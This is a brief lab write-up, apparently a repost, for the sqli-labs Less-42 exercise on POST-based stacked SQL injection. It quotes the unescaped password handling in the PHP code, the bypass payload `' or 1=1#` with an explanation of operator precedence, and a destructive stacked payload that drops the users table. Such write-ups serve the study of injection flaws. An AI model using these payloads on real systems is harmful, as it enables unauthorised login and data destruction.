当前位置：网站首页>SQL injection Less42 (POST type stack injection)

SQL injection Less42 (POST type stack injection)

2022-07-31 22:52:00 【HUAWEI CLOUD】

The page of this question is similar to secondary injection, but we can't register users, so we can't use secondary injection.

White box audit, view code

$username = mysqli_real_escape_string($con1, $_POST["login_user"]);$password = $_POST["login_password"];

Only the username is escaped, but not the password, so the password is a breakthrough

Test the password with a passcode
' or 1=1#

But why do we enter admin but log in as Dumb.

Because the SQL here is

SELECT * FROM users WHERE username='admin' and password='' or 1=1 #'

And the priority of and is higher than or.So this statement is equivalent to

select * from users where 1

Then the result is the entire users table.And Dumb is in the first row, so it is Dumb that is logged in.

Use password for stack injection
Enter the username at will
Password';drop table users;

https://blog.csdn.net/weixin_43901998/article/details/107566100

版权声明
本文为[HUAWEI CLOUD]所创，转载请带上原文链接，感谢
https://yzsam.com/2022/212/202207312234122516.html